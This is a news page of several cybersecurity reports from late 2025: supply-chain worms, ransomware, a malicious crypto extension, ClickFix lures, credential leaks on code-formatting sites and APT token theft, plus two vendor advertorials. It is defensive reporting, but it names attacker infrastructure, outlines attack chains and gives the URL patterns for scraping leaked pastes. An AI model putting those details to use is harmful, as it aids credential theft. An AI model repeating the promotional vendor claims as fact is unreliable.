Category: Cybersecurity

The second wave of the Shai-Hulud supply chain attack has spilled over to the Maven ecosystem after compromising more than 830 packages in the npm registry.

The Socket Research Team said it identified a Maven Central package named org.mvnpm:posthog-node:4.18.1 that embeds the same two components associated with Sha1-Hulud: the “setup_bun.js” loader and the main payload “bun_environment.js.”

“This means the PostHog project has compromised releases in both the JavaScript/npm and Java/Maven ecosystems, driven by the same Shai Hulud v2 payload,” the cybersecurity company said in a Tuesday update.

It’s worth noting that the Maven Central package is not published by PostHog itself. Rather, the “org.mvnpm” coordinates are generated via an automated mvnpm process that rebuilds npm packages as Maven artifacts. The Maven Central said they are working to implement extra protections to prevent already known compromised npm components from being rebundled. As of November 25, 2025, 22:44 UTC, all mirrored copies have been purged.

The development comes as the “second coming” of the supply chain incident has targeted developers globally with an aim to steal sensitive data like API keys, cloud credentials, and npm and GitHub tokens, and facilitate deeper supply chain compromise in a worm-like fashion. The latest iteration has also evolved to be more stealthy, aggressive, scalable, and destructive.

Besides borrowing the overall infection chain of the initial September variant, the attack allows threat actors to gain unauthorized access to npm maintainer accounts and publish trojanized versions of their packages. When unsuspecting developers download and run these libraries, the embedded malicious code backdoors their own machines and scans for secrets and exfiltrates them to GitHub repositories using the stolen tokens.

The attack accomplishes this by injecting two rogue workflows, one of which registers the victim machine as a self-hosted runner and enables arbitrary command execution whenever a GitHub Discussion is opened. A second workflow is designed to systematically harvest all secrets. Over 28,000 repositories have been affected by the incident.

“This version significantly enhances stealth by utilizing the Bun runtime to hide its core logic and increases its potential scale by raising the infection cap from 20 to 100 packages,” Cycode’s Ronen Slavin and Roni Kuznicki said. “It also uses a new evasion technique, exfiltrating stolen data to randomly named public GitHub repositories instead of a single, hard-coded one.”

The attacks illustrate how trivial it is for attackers to take advantage of trusted software distribution pathways to push malicious versions at scale and compromise thousands of downstream developers. What’s more, the self-replication nature of the malware means a single infected account is enough to amplify the blast radius of the attack and turn it into a widespread outbreak in a short span of time.

Further analysis by Aikido has uncovered that the threat actors exploited vulnerabilities, specifically focusing on CI misconfigurations in pull_request_target and workflow_run workflows, in existing GitHub Actions workflows to pull off the attack and compromise projects associated with AsyncAPI, PostHog, and Postman.

The vulnerability “used the risky pull_request_target trigger in a way that allowed code supplied by any new pull request to be executed during the CI run,” security researcher Ilyas Makari said. “A single misconfiguration can turn a repository into a patient zero for a fast-spreading attack, giving an adversary the ability to push malicious code through automated pipelines you rely on every day.”

It’s assessed that the activity is the continuation of a broader set of attacks targeting the ecosystem that commenced with the August 2025 S1ngularity campaign impacting several Nx packages on npm.

“As a new and significantly more aggressive wave of npm supply chain malware, Shai-Hulud 2 combines stealthy execution, credential breadth, and fallback destructive behavior, making it one of the most impactful supply chain attacks of the year,” Nadav Sharkazy, a product manager at Apiiro, said in a statement.

“This malware shows how a single compromise in a popular library can cascade into thousands of downstream applications by trojanizing legitimate packages during installation.”

Data compiled by GitGuardian, OX Security, and Wiz shows that the campaign has leaked hundreds of GitHub access tokens and credentials associated with Amazon Web Services (AWS), Google Cloud, and Microsoft Azure. More than 5,000 files were uploaded to GitHub with the exfiltrated secrets. GitGuardian’s analysis of 4,645 GitHub repositories has identified 11,858 unique secrets, out of which 2,298 remained valid and publicly exposed as of November 24, 2025.

Users are advised to rotate all tokens and keys, audit all dependencies, remove compromised versions, reinstall clean packages, and harden developer and CI/CD environments with least-privilege access, secret scanning, and automated policy enforcement.

“Sha1-Hulud is another reminder that the modern software supply chain is still way too easy to break,” Dan Lorenc, co-founder and CEO of Chainguard, said. “A single compromised maintainer and a malicious install script is all it takes to ripple through thousands of downstream projects in a matter of hours.”

“The techniques attackers are using are constantly evolving. Most of these attacks don’t rely on zero-days. They exploit the gaps in how open source software is published, packaged, and pulled into production systems. The only real defense is changing the way software gets built and consumed.”

South Korea’s financial sector has been targeted by what has been described as a sophisticated supply chain attack that led to the deployment of Qilin ransomware.

“This operation combined the capabilities of a major Ransomware-as-a-Service (RaaS) group, Qilin, with potential involvement from North Korean state-affiliated actors (Moonstone Sleet), leveraging Managed Service Provider (MSP) compromise as the initial access vector,” Bitdefender said in a report shared with The Hacker News.

Qilin has emerged as one of the most active ransomware operations this year, with the RaaS crew exhibiting “explosive growth” in the month of October 2025 by claiming over 180 victims. The group is responsible for 29% of all ransomware attacks, per data from NCC Group.

The Romanian cybersecurity company said it decided to dig deeper after uncovering an unusual spike in ransomware victims from South Korea in September 2025, when it became the second-most affected country by ransomware after the U.S., with 25 cases, a significant jump from an average of about 2 victims per month between September 2024 and August 2025.

Further analysis found that all 25 cases were attributed exclusively to the Qilin ransomware group, with 24 of the victims in the financial sector. The campaign was given the moniker Korean Leaks by the attackers themselves.

While Qilin’s origins are likely Russian, the group describes itself as “political activists” and “patriots of the country.” It follows a traditional affiliate model, which involves recruiting a diverse group of hackers to carry out the attacks in return for taking a small share of up to 20% of the illicit payments.

One particular affiliate of note is a North Korean threat actor tracked as Moonstone Sleet, which, according to Microsoft, has deployed a custom ransomware variant called FakePenny in an attack targeting an unnamed defense technology company in April 2024.

Then, earlier this February, a significant pivot occurred when the adversary was observed delivering Qilin ransomware at a limited number of organizations. While it’s not exactly clear if the latest set of attacks was indeed carried out by the hacking group, the targeting of South Korean businesses aligns with its strategic objectives.

Korean Leaks took place over three publication waves, resulting in the theft of over 1 million files and 2 TB of data from 28 victims. Victim posts associated with four other entities were removed from the data leak site (DLS), suggesting that they may have been taken down either following ransom negotiations or a unique internal policy, Bitdefender said.

The three waves are as follows –

• Wave 1, comprising 10 victims from the financial management sector that was published on September 14, 2025
• Wave 2, comprising nine victims that were published between September 17 and 19, 2025
• Wave 3, comprising nine victims that were published between September 28 and October 4, 2025

An unusual aspect about these leaks is the departure from established tactics of exerting pressure on compromised organizations, instead leaning heavily on propaganda and political language.

“The entire campaign was framed as a public-service effort to expose systemic corruption, exemplified by the threats to release files that could be ‘evidence of stock market manipulation’ and names of ‘well-known politicians and businessmen in Korea,’” Bitdefender said of the first wave of the campaign.

Subsequent waves went on to escalate the threat a notch higher, claiming that the leak of the data could pose a severe risk to the Korean financial market. The actors also called on South Korean authorities to investigate the case, citing stringent data protection laws.

A further shift in messaging was observed in the third wave, where the group initially continued the same theme of a national financial crisis resulting from the release of stolen information, but then switched to a language that “more closely resembled Qilin’s typical, financially motivated extortion messages.”

Given that Qilin boasts of an “in-house team of journalists” to help affiliates with writing texts for blog posts and help apply pressure during negotiations, it’s assessed that the group’s core members were behind the publication of the DLS text.

“The posts contain several of the core operator’s signature grammatical inconsistencies,” Bitdefender said. “However, this control over the final draft does not mean the affiliate was excluded from having a critical say in the key messaging or overall direction of the content.”

To pull off these attacks, the Qilin affiliate is said to have breached a single upstream managed service provider (MSP), leveraging the access to compromise several victims at once. On September 23, 2025, the Korea JoongAng Daily reported that more than 20 asset management companies in the country were infected with ransomware following the compromise of GJTec.

To mitigate these risks, it’s essential that organizations enforce Multi-Factor Authentication (MFA), apply the Principle of Least Privilege (PoLP) to restrict access, segment critical systems and sensitive data, and take proactive steps to reduce attack surfaces.

“The MSP compromise that triggered the ‘Korean Leaks’ operation highlights a critical blind spot in cybersecurity discussions,” Bitdefender said. “Exploiting a vendor, contractor, or MSP that has access to other businesses is a more prevalent and practical route that RaaS groups seeking clustered victims can take.”

Enterprises today are expected to have at least 6-8 detection tools, as detection is considered a standard investment and the first line of defense. Yet security leaders struggle to justify dedicating resources further down the alert lifecycle to their superiors.

As a result, most organizations’ security investments are asymmetrical, robust detection tools paired with an under-resourced SOC, their last line of defense.

A recent case study demonstrates how companies with a standardized SOC prevented a sophisticated phishing attack that bypassed leading email security tools. In this case study, a cross-company phishing campaign targeted C-suite executives at multiple enterprises. Eight different email security tools across these organizations failed to detect the attack, and phishing emails reached executive inboxes. However, each organization’s SOC team detected the attack immediately after employees reported the suspicious emails.

Why did all eight detection tools identically fail where the SOC succeeded?

What all these organizations have in common is a balanced investment across the alert lifecycle, which doesn’t neglect their SOC.

This article examines how investing in the SOC is indispensable for organizations that have already allocated significant resources to detection tools. Additionally, a balanced SOC investment is crucial for maximizing the value of their existing detection investments.

Detection tools and the SOC operate in parallel universes

Understanding this fundamental disconnect explains how security gaps arise:

Detection tools operate in milliseconds. They must make instant decisions on millions of signals every day. They have no time for nuance; speed is essential. Without it, networks would come to a halt, as every email, file, and connection request would be held up for analysis.

Detection tools zoom in. They are the first to identify and isolate potential threats, but they lack an understanding of the bigger picture. Meanwhile, SOC teams operate with a 30K feet view. When alerts reach analysts, they have something detection tools lack: time and context.

Consequently, the SOC tackles alerts from a different perspective:

1. They can analyze behavioral patterns, such as why an executive suddenly logs in from a datacenter IP address when they usually work from London.
2. They can stitch data across tools. They can view a clean reputation email domain along with subsequent authentication attempts and user reports.
3. They can identify patterns that only make sense when seen together, such as exclusive targeting of finance executives combined with timing that aligns with payroll cycles.

Three critical risks of an underfunded SOC

First, it can make it more difficult for executive leadership to identify the root of the problem. CISOs and budget holders in organizations that deploy various detection tools often assume their investments will keep them safe. Meanwhile, the SOC experiences this differently, overwhelmed by noise and lacking the resources to properly investigate real threats. Because detection spending is obvious, while SOC struggles happen behind closed doors, security leaders find it challenging to demonstrate the need for additional investment in their SOC.

Second, the asymmetry overwhelms the last line of defense. Significant investments in multiple detection tools produce thousands of alerts that flood the SOC every day. With underfunded SOCs, analysts become goalies facing hundreds of shots at once, forced to make split-second decisions under immense pressure.

Third, it undermines the ability to identify nuanced threats. When the SOC is overwhelmed by alerts, the capacity for detailed investigative work is lost. The threats that escape detection are the ones that detection tools would never catch in the first place.

When detection tools generate hundreds of alerts daily, adding a few more SOC analysts is as effective as trying to save a sinking ship with a bucket. The traditional alternative has been outsourcing to MSSPs or MDRs and assigning external teams to handle overflow.

But for many, the trade-offs are still too much: high ongoing costs, shallow analyst investigations that are unfamiliar with your environment, delays in coordination, and broken communication. Outsourcing doesn’t fix the imbalance; it just shifts the burden onto someone else’s plate.

Today, AI SOC platforms are becoming the preferred choice for organizations with lean SOC teams looking for an efficient, cost-effective, and scalable solution. AI SOC platforms operate at the investigation layer where contextual reasoning happens, automate alert triage, and surface only high-fidelity incidents after assigning them context.

With the help of AI SOC, analysts save hundreds of hours each month, as false-positive rates often drop by more than 90%. This automated coverage enables small internal teams to provide 24/7 coverage without additional staffing or outsourcing. The companies featured in this case study invested in this approach through Radiant Security, an agentic AI SOC platform.

2 ways SOC investment pays off, now and later

1. SOC investments make the cost of detection tools worthwhile. Your detection tools are only as effective as your ability to investigate their alerts. When 40% of alerts go uninvestigated, you’re not getting the full value of every detection tool you own. Without sufficient SOC capacity, you’re paying for detection capabilities that you can’t fully utilize.
2. The last line’s unique perspective will become increasingly critical. SOC will become increasingly essential as detection tools fail more often. As attacks grow more sophisticated, detection will need more context. The SOC’s perspective will mean only they can connect these dots and see the entire picture.

3 questions to guide your next security budget

1. Is your security investment symmetric? Begin by assessing your resource allocation for imbalance. The first indication of asymmetrical security is having more alerts than your SOC can handle. If your analysts are overwhelmed by alerts, it means your frontline is exceeding your backline.
2. Is your SOC a qualified safety net? Every SOC leader must ask, if detection fails, is the SOC prepared to catch what gets through? Many organizations never ask this because they don’t see detection as the SOC’s responsibility. But when detection tools fail, responsibilities shift.
3. Are you underutilizing existing tools? Many organizations find that their detection tools produce valuable signals that no one has time to investigate. Asymmetry means lacking the ability to act on what you already possess.

Key takeaways from Radiant Security

Most security teams have the opportunity to allocate resources to maximize ROI from their current detection investments, support future growth, and enhance protection. Organizations that invest in detection tools but neglect their SOC create blind spots and burnout.

Radiant Security, the agentic AI SOC platform highlighted in the case study, shows success through balanced security investment. Radiant works at the SOC investigation layer, automatically triaging every alert, cutting false positives by about 90%, and analyzing threats at machine speed, like a top analyst. With over 100 integrations with existing security tools and one-click response features, Radiant helps lean security teams investigate any alert, known or unknown, without needing impossible headcount increases. Radiant security makes enterprise-grade SOC capabilities available to organizations of any size.

Nov 26, 2025The Hacker NewsSoftware Security / Patch Management

If you’re using community tools like Chocolatey or Winget to keep systems updated, you’re not alone. These platforms are fast, flexible, and easy to work with—making them favorites for IT teams. But there’s a catch…

The very tools that make your job easier might also be the reason your systems are at risk.

These tools are run by the community. That means anyone can add or update packages. Some packages may be old, missing safety checks, or changed by mistake or on purpose. Hackers look for these weak spots. This has already happened in places like NPM and PyPI. The same risks can happen with Windows tools too.

To help you patch safely without slowing down, there’s a free webinar coming up. It’s led by Gene Moody, Field CTO at Action1. He’ll walk through how these tools work, where the risks are, and how to protect your systems while keeping updates on track.

In this session, he’ll test how safe these tools really are. You’ll get practical steps you can use right away—nothing theoretical, just what works.

The goal is not to scare you away from community tools. They’re useful. But they need guardrails—rules that help you use them safely without slowing you down.

You will learn:

🔒 How to spot hidden risks

⚙️ How to set safety checks like source pinning, allow-lists, and hash/signature verification

📊 How to prioritize updates using known vulnerability data (KEV)

📦 How to choose between community tools, direct vendor sources, or a mix of both

If you’re not sure when to use community repos and when to go straight to the vendor, this session will help you decide. You’ll also see how to mix both in a safe way.

This webinar is for anyone who manages software updates—whether you’re on a small team or a large one. If you’ve ever wondered what’s really inside that next patch, this session is for you.

It’s free to attend, and you’ll leave with clear actions you can apply the same day. Save your spot here.

Nov 26, 2025Ravie LakshmananBrowser Security / Cryptocurrency

Cybersecurity researchers have discovered a new malicious extension on the Chrome Web Store that’s capable of injecting a stealthy Solana transfer into a swap transaction and transferring the funds to an attacker-controlled cryptocurrency wallet.

The extension, named Crypto Copilot, was first published by a user named “sjclark76” on May 7, 2024. The developer describes the browser add-on as offering the ability to “trade crypto directly on X with real-time insights and seamless execution.” The extension has 12 installs and remains available for download as of writing.

“Behind the interface, the extension injects an extra transfer into every Solana swap, siphoning a minimum of 0.0013 SOL or 0.05% of the trade amount to a hardcoded attacker-controlled wallet,” Socket security researcher Kush Pandya said in a Tuesday report.

Specifically, the extension incorporates obfuscated code that comes to life when a user performs a Raydium swap, manipulating it to inject an undisclosed SOL transfer into the same signed transaction. Raydium is a decentralized exchange (DEX) and automated market maker (AMM) built on the Solana blockchain.

It works by appending a hidden SystemProgram.transfer util method to each swap before the user’s signature is requested, and sends the fee to a hard-coded wallet embedded in the code. The fee is calculated based on the amount traded, charging a minimum of 0.0013 SOL for trades and 2.6 SOL and 0.05% of the swap amount if it’s more than 2.6 SOL. To avoid detection, the malicious behavior is concealed using techniques like minification and variable renaming.

The extension also communicates with a backend hosted on the domain “crypto-coplilot-dashboard.vercel[.]app” to register connected wallets, fetch points and referral data, and report user activity. The domain, along with “cryptocopilot[.]app,” does not host any real product.

What’s notable about the attack is that users are completely kept in the dark about the hidden platform fee, and the user interface only shows details of the swap. Furthermore, Crypto Copilot makes use of legitimate services like DexScreener and Helius RPC to lend it a veneer of trust.

“Because this transfer is added silently and sent to a personal wallet rather than a protocol treasury, most users will never notice it unless they inspect each instruction before signing,” Pandya said. “The surrounding infrastructure appears designed only to pass Chrome Web Store review and provide a veneer of legitimacy while siphoning fees in the background.”

Nov 26, 2025Ravie LakshmananMalware / Cyber Espionage

The threat actors behind a malware family known as RomCom targeted a U.S.-based civil engineering company via a JavaScript loader dubbed SocGholish to deliver the Mythic Agent.

“This is the first time that a RomCom payload has been observed being distributed by SocGholish,” Arctic Wolf Labs researcher Jacob Faires said in a Tuesday report.

The activity has been attributed with medium-to-high confidence to Unit 29155 of Russia’s Main Directorate of the General Staff of the Armed Forces of the Russian Federation, also known as GRU. According to the cybersecurity company, the targeted entity had worked for a city with close ties to Ukraine in the past.

SocGholish (aka FakeUpdates), linked to a financially motivated operator tracked as TA569 (aka Gold Prelude, Mustard Tempest, Purple Vallhund, and UNC1543), serves as an initial access broker, allowing other threat actors to drop a wide range of payloads. Some of its known customers are Evil Corp, LockBit, Dridex, and Raspberry Robin.

The attack chains typically involve serving fake browser update alerts for Google Chrome or Mozilla Firefox on legitimate-but-compromised websites to trick unsuspecting users into downloading malicious JavaScript that’s responsible for installing a loader, which then fetches additional malware.

For the most part, the attacks single out websites that are poorly secured, taking advantage of known security vulnerabilities in plugins to inject JavaScript code that’s designed to display the pop-up and activate the infection chain.

RomCom (aka Nebulous Mantis, Storm-0978, Tropical Scorpius, UNC2596, or Void Rabisu), on the other hand, is the name assigned to a Russia-aligned threat actor that’s known to dabble in both cybercrime and espionage operations since at least 2022.

The threat actor leverages several methods, including spear-phishing and zero-day exploits, to breach target networks and drop the eponymous remote access trojan (RAT) on victim machines. Attacks mounted by the hacking group have singled out entities in Ukraine, as well as NATO-related defense organizations.

In the attack analyzed by Arctic Wolf, the fake update payload allows the threat actors to run commands on the compromised machine by means of a reverse shell established to a command-and-control (C2) server. This includes conducting reconnaissance and dropping a custom Python backdoor codenamed VIPERTUNNEL.

Also delivered is a RomCom-linked DLL loader that launches the Mythic Agent, a crucial component of the cross-platform, post-exploit, red teaming framework that communicates with a corresponding server to support command execution, file operations, and others.

While the attack was ultimately unsuccessful and was blocked before it could progress any further, the development shows the RomCom threat actor’s continued interest in targeting Ukraine or entities providing assistance to the country, no matter how tenuous the connection may be.

“The timeline from infection via [the fake update] to the delivery of RomCom’s loader was less than 30 minutes,” Jacob Faires said. “Delivery is not made until the target’s Active Directory domain has been verified to match a known value provided by the threat actor.”

“The widespread nature of SocGholish attacks and the relative speed at which the attack progresses from initial access to infection makes it a potent threat to organizations worldwide.”

The U.S. Federal Bureau of Investigation (FBI) has warned that cybercriminals are impersonating financial institutions with an aim to steal money or sensitive information to facilitate account takeover (ATO) fraud schemes.

The activity targets individuals, businesses, and organizations of varied sizes and across sectors, the agency said, adding the fraudulent schemes have led to more than $262 million in losses since the start of the year. The FBI said it has received over 5,100 complaints.

ATO fraud typically refers to attacks that enable threat actors to obtain unauthorized access to an online financial institution, payroll system, or health savings account to siphon data and funds for personal gain. The access is often obtained by approaching targets through social engineering techniques, such as texts, calls, and emails that prey on users’ fears, or via bogus websites.

These methods make it possible for attackers to deceive users into providing their login credentials on a phishing site, in some instances, urging them to click on a link to report purported fraudulent transactions recorded against their accounts.

“A cybercriminal manipulates the account owner into giving away their login credentials, including multi-factor authentication (MFA) code or One-Time Passcode (OTP), by impersonating a financial institution employee, customer support, or technical support personnel,” the FBI said.

“The cybercriminal then uses login credentials to log into the legitimate financial institution website and initiate a password reset, ultimately gaining full control of the accounts.”

Other cases involve threat actors masquerading as financial institutions contacting account owners, claiming their information was used to make fraudulent purchases, including firearms, and then convincing them to provide their account information to a second cybercriminal impersonating law enforcement.

The FBI said ATO fraud can also involve the use of Search Engine Optimization (SEO) poisoning to trick users looking for businesses on search engines into clicking on phony links that redirect to a lookalike site by means of malicious search engine ads.

Regardless of the method used, the attacks have one aim: to seize control of the accounts and swiftly wire funds to other accounts under their control, and change the passwords, effectively locking out the account owner. The accounts to which the money is transferred are further linked to cryptocurrency wallets to convert them into digital assets and obscure the money trail.

“The large majority of ATO accounts referenced in the FBI announcement occur through compromised credentials used by threat actors intimately familiar with the internal processes and workflows for money movement within financial institutions,” Jim Routh, chief trust officer at Saviynt, said in a statement.

“The most effective controls to prevent these attacks are manual (phone calls for verification) and SMS messages for approval. The root cause continues to be the accepted use of credentials for cloud accounts despite having passwordless options available.”

The development comes as Darktrace, Flashpoint, Forcepoint, Fortinet, and Zimperium have highlighted the major cybersecurity threats ahead of the holiday season, including Black Friday scams, QR code fraud, gift card draining, and high-volume phishing campaigns that mimic popular brands like Amazon and Temu.

Many of these activities leverage artificial intelligence (AI) tools to produce highly persuasive phishing emails, fake websites, and social media ads, allowing even low-skill attackers to pull off attacks that appear trustworthy and increase the success rate of their campaigns.

Fortinet FortiGuard Labs said it detected at least 750 malicious, holiday-themed domains registered over the last three months, with many using key terms like “Christmas,” “Black Friday,” and “Flash Sale.” “Over the last three months, more than 1.57 million login accounts tied to major e-commerce sites, available through stealer logs, were collected across underground markets,” the company said.

Attackers have also been found actively exploiting security vulnerabilities across Adobe/Magento, Oracle E-Business Suite, WooCommerce, Bagisto, and other common e-commerce platforms. Some of the exploited vulnerabilities include CVE-2025-54236, CVE-2025-61882, and CVE-2025-47569.

According to Zimperium zLabs, there has been a 4x increase in mobile phishing (aka mishing) sites, with attackers leveraging trusted brand names to create urgency and deceive users into clicking, logging in, or downloading malicious updates.”

What’s more, Recorded Future has called attention to purchase scams where threat actors use fake e-commerce stores to steal victim data and authorize fraudulent payments for non-existent goods and services. It described the scams as a “major emerging fraud threat.”

“A sophisticated dark web ecosystem allows threat actors to quickly establish new purchase scam infrastructure and amplify their impact,” the company said. “Promotional activities mirroring traditional marketing – including an offer to sell stolen card data on the dark web carding shop PP24 – are widespread in this underground.”

“Threat actors fund ad campaigns with stolen payment cards to spread purchase scams, which in turn compromise more payment card data, fueling a continuing cycle of fraud.

Nov 25, 2025Ravie LakshmananData Exposure / Cloud Security

New research has found that organizations in various sensitive sectors, including governments, telecoms, and critical infrastructure, are pasting passwords and credentials into online tools like JSONformatter and CodeBeautify that are used to format and validate code.

Cybersecurity company watchTowr Labs said it captured a dataset of over 80,000 files on these sites, uncovering thousands of usernames, passwords, repository authentication keys, Active Directory credentials, database credentials, FTP credentials, cloud environment keys, LDAP configuration information, helpdesk API keys, meeting room API keys, SSH session recordings, and all kinds of personal information.

This includes five years of historical JSONFormatter content and one year of historical CodeBeautify content, totalling over 5GB worth of enriched, annotated JSON data.

Organizations impacted by the leak span critical national infrastructure, government, finance, insurance, banking, technology, retail, aerospace, telecommunications, healthcare, education, travel, and, ironically, cybersecurity sectors.

“These tools are extremely popular, often appearing near the top of search results for terms like ‘JSON beautify’ and ‘best place to paste secrets’ (probably, unproven) — and used by a wide variety of organizations, organisms, developers, and administrators in both enterprise environments and for personal projects,” security researcher Jake Knott said in a report shared with The Hacker News.

Both tools also offer the ability to save a formatted JSON structure or code, turning it into a semi-permanent, shareable link with others – effectively allowing anyone with access to the URL to access the data.

As it happens, the sites not only provide a handy Recent Links page to list all recently saved links, but also follow a predictable URL format for the shareable link, thereby making it easier for a bad actor to retrieve all URLs using a simple crawler –

• https://jsonformatter.org/{id-here}
• https://jsonformatter.org/{formatter-type}/{id-here}
• https://codebeautify.org/{formatter-type}/{id-here}

Some examples of leaked information include Jenkins secrets, a cybersecurity company exposing encrypted credentials for sensitive configuration files, Know Your Customer (KYC) information associated with a bank, a major financial exchange’s AWS credentials linked to Splunk, and Active Directory credentials for a bank.

To make matters worse, the company said it uploaded fake AWS access keys to one of these tools, and found bad actors attempting to abuse them 48 hours after it was saved. This indicates that valuable information exposed through these sources is being scraped by other parties and tested, posing severe risks.

“Mostly because someone is already exploiting it, and this is all really, really stupid,” Knott said. “We don’t need more AI-driven agentic agent platforms; we need fewer critical organizations pasting credentials into random websites.”

When checked by The Hacker News, both JSONFormatter and CodeBeautify have temporarily disabled the save functionality, claiming they are “working on to make it better” and implementing “enhanced NSFW (Not Safe For Work) content prevention measures.”

watchTowr said that the save functionality was disabled by these sites likely in response to the research. “We suspect this change occurred in September in response to communication from a number of the affected organizations we alerted,” it added.

Cybersecurity researchers are calling attention to a new campaign that’s leveraging a combination of ClickFix lures and fake adult websites to deceive users into running malicious commands under the guise of a “critical” Windows security update.

“Campaign leverages fake adult websites (xHamster, PornHub clones) as its phishing mechanism, likely distributed via malvertising,” Acronis said in a new report shared with The Hacker News. “The adult theme, and possible connection to shady websites, adds to the victim’s psychological pressure to comply with sudden ‘security update’ installation.”

ClickFix-style attacks have surged over the past year, typically tricking users into running malicious commands on their own machines using prompts for technical fixes or completing CAPTCHA verification checks. According to data from Microsoft, ClickFix has become the most common initial access method, accounting for 47% of attacks.

The latest campaign displays highly convincing fake Windows update screens in an attempt to get the victim to run malicious code, indicating that attackers are moving away from the traditional robot-check lures. The activity has been codenamed JackFix by the Singapore-based cybersecurity company.

Perhaps the most concerning aspect of the attack is that the phony Windows update alert hijacks the entire screen and instructs the victim to open the Windows Run dialog, press Ctrl + V, and hit Enter, thereby triggering the infection sequence.

It’s assessed that the starting point of the attack is a fake adult site to which unsuspecting users are redirected via malvertising or other social engineering methods, only to suddenly serve them an “urgent security update.” Select iterations of the sites have been found to include developer comments in Russian, hinting at the possibility of a Russian-speaking threat actor.

“The Windows Update screen is created entirely using HTML and JavaScript code, and pops up as soon as the victim interacts with any element on the phishing site,” security researcher Eliad Kimhy said. “The page attempts to go full screen via JavaScript code, while at the same time creating a fairly convincing Windows Update window composed of a blue background and white text, reminiscent of Windows’ infamous blue screen of death.”

What’s notable about the attack is that it heavily leans on obfuscation to conceal ClickFix-related code, as well as blocks users from escaping the full-screen alert by disabling the Escape and F11 buttons, along with F5 and F12 keys. However, due to faulty logic, users can still press the Escape and F11 buttons to get rid of the full screen.

The downloaded PowerShell script also packs in various obfuscation and anti-analysis mechanisms, one of which is the use of garbage code to complicate analysis efforts. It also attempts to elevate privileges and creates Microsoft Defender Antivirus exclusions for command-and-control (C2) addresses and paths where the payloads are staged.

To achieve privilege escalation, the malware uses the Start-Process cmdlet in conjunction with the “-Verb RunAs” parameter to launch PowerShell with administrative rights and continuously prompts for permission until it’s granted by the victim. Once this step is successful, the script is designed to drop additional payloads, such as simple remote access trojans (RATs) that are programmed to contact a C2 server, presumably to drop more malware.

The PowerShell script has also been observed to serve up to eight different payloads, with Acronis describing it as the “most egregious example of spray and pray.” These include Rhadamanthys Stealer, Vidar Stealer 2.0, RedLine Stealer, Amadey, as well as other unspecified loaders and RATs.

“If only one of these payloads manages to run successfully, victims risk losing passwords, crypto wallets, and more,” Kimhy said. “In the case of a few of these loaders — the attacker may choose to bring in other payloads into the attack, and the attack can quickly escalate further.”

The disclosure comes as Huntress detailed a multi-stage malware execution chain that originates from a ClickFix lure masquerading as a Windows update and deploys stealer malware like Lumma and Rhadamanthys by concealing the final stages within an image, a technique known as steganography.

Like in the case of the aforementioned campaign, the ClickFix command copied to the clipboard and pasted into the Run dialog uses mshta.exe to run a JavaScript payload that’s capable of running a remotely-hosted PowerShell script directly in memory.

The PowerShell code is used to decrypt and launch a .NET assembly payload, a loader dubbed Stego Loader that serves as a conduit for the execution of Donut-packed shellcode hidden within an embedded and encrypted PNG file. The extracted shellcode is then injected into a target process to ultimately deploy Lumma or Rhadamanthys.

Interestingly, one of the domains listed by Huntress as being used to fetch the PowerShell script (“securitysettings[.]live”) has also been flagged by Acronis, suggesting these two activity clusters may be related.

“The threat actor often changes the URI (/tick.odd, /gpsc.dat, /ercx.dat, etc.) used to host the first mshta.exe stage,” security researchers Ben Folland and Anna Pham said in the report.

“Additionally, the threat actor moved from hosting the second stage on the domain securitysettings[.]live and instead hosted on xoiiasdpsdoasdpojas[.]com, although both point to the same IP address 141.98.80[.]175, which was also used to deliver the first stage [i.e., the JavaScript code run by mshta.exe].”

ClickFix has become hugely successful as it relies on a simple yet effective method, which is to entice a user into infecting their own machine and bypassing security controls. Organizations can defend against such attacks by training employees to better spot the threat and disabling the Windows Run box via Registry changes or Group Policy.

Nov 25, 2025Ravie LakshmananMalware / Vulnerability

The threat actor known as ToddyCat has been observed adopting new methods to obtain access to corporate email data belonging to target companies, including using a custom tool dubbed TCSectorCopy.

“This attack allows them to obtain tokens for the OAuth 2.0 authorization protocol using the user’s browser, which can be used outside the perimeter of the compromised infrastructure to access corporate mail,” Kaspersky said in a technical breakdown.

ToddyCat, assessed to be active since 2020, has a track record of targeting various organizations in Europe and Asia with various tools, Samurai and TomBerBil to retain access and steal cookies and credentials from web browsers like Google Chrome and Microsoft Edge.

Earlier this April, the hacking group was attributed to the exploitation of a security flaw in ESET Command Line Scanner (CVE-2024-11859, CVSS score: 6.8) to deliver a previously undocumented malware codenamed TCESB.

Kaspersky said it detected a PowerShell variant of TomBerBil (as opposed to C++ and C# versions flagged before) in attacks that took place between May and June 2024, which comes with capabilities to extract data from Mozilla Firefox. A notable feature of this version is that it runs on domain controllers from a privileged user and can access browser files via shared network resources using the SMB protocol.

The malware, the company added, was launched by means of a scheduled task that executed a PowerShell command. Specifically, it searches for browser history, cookies, and saved credentials in the remote host over SMB. While the copied files containing the information are encrypted using the Windows Data Protection API (DPAPI), TomBerBil is equipped to capture the encryption key necessary to decrypt the data.

“The previous version of TomBerBil ran on the host and copied the user token. As a result, DPAPI was used to decrypt the master key in the user’s current session, and subsequently the files themselves,” researchers said. “In the newer server version, TomBerBil copies files containing user encryption keys that are used by DPAPI. Using these keys, as well as the user’s SID and password, attackers can decrypt all copied files locally.”

The threat actors have also been found to access corporate emails stored in local Microsoft Outlook storage in the form of OST (short for Offline Storage Table) files using TCSectorCopy (“xCopy.exe”), bypassing restrictions that limit access to such files when the application is running.

Written in C++, TCSectorCopy accepts as input a file to be copied (in this case, OST files) and then proceeds to open the disk as a read-only device and sequentially copy the file contents sector by sector. Once the OST files are written to a path of the attacker’s choosing, the contents of the electronic correspondence are extracted using XstReader, an open-source viewer for Outlook OST and PST files.

Another tactic adopted by ToddyCat involves efforts to obtain access tokens directly from memory in cases where victim organizations used the Microsoft 365 cloud service. The JSON web tokens (JWTs) are obtained through an open-source C# tool named SharpTokenFinder, which enumerates Microsoft 365 applications for plain text authentication tokens.

But the threat actor is said to have faced a setback in at least one investigated incident after security software installed on the system blocked SharpTokenFinder’s attempt to dump the Outlook.exe process. To get around this restriction, the operator used the ProcDump tool from the Sysinternals package with specific arguments to take a memory dump of the Outlook process.

“The ToddyCat APT group is constantly developing its techniques and looking for those that would hide activity to gain access to corporate correspondence within the compromised infrastructure,” Kaspersky said.